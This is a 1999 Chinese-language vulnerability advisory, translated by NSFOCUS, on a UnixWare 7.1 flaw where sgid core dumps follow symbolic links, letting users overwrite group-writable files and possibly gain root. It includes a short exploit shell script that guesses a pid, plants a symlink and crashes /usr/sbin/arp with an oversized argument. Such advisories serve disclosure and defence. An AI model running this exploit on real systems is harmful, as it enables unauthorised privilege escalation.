安全研究
安全漏洞
UnixWare coredumps 跟随的符号连接
发布日期:1999-12-04
更新日期:1999-12-04
受影响系统:UnixWare 7.1
描述:
用户可以用coredump数据覆盖系统文件,存在获得root权限的可能性。
UnixWare的sgid执行文件允许dump core(suid不允许)。通过”计算“将要调用的sgid执行文件的pid,可以从./core.pid建立一个符号连接到一个group有写权限的文件。
如果能找出与./.rhosts或/etc/hosts.equiv的关联,将会有机会得到root权限。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/bin/sh
####
# Exploit for UnixWare 7.1 - sgid coredumps follow symlinks.
# Guessing pid is trivial. Any sgid program which will coredump can be used
# -Brock Tellier, btellier@usa.net
####
pid=`expr $$ + 4`;
ln -s /path/to/sys/group/writable/file core.$pid
/usr/sbin/arp `perl -e "print ''A'' x 10000"`
建议:
暂无
浏览次数:7038
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |